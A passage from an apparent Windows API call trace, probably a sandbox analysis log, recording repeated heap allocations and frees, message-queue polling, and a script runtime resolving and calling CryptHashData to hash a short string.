Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0264.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0264.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0264.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0264.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f78 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0264.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0264.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0264.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0264.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.667] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0264.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0264.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0264.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0264.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550c8 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0264.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0264.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0264.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0264.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0264.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0264.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0264.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ee8 [0264.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0264.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0264.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0264.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0264.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55018 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.670] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0264.670] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0264.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0264.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0264.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0264.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0264.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0264.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51e68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0264.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.672] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0264.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.672] CryptHashData (hHash=0xa87550, pbData=0x2e550c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0264.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0264.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.672] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51cb8 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0264.673] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0264.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0264.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0264.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0264.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0264.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.674] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0264.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0264.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e98 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0264.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0264.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.674] HeapFree 